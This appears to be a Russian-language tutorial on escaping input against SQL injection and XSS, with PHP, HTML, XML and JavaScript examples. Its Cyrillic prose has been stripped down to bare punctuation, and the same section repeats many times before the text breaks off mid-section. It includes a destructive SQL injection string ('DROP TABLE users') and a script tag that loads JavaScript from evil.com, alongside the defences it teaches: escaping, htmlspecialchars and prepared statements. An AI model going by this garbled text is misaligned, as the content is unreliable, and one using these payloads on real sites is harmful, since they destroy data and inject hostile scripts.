? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
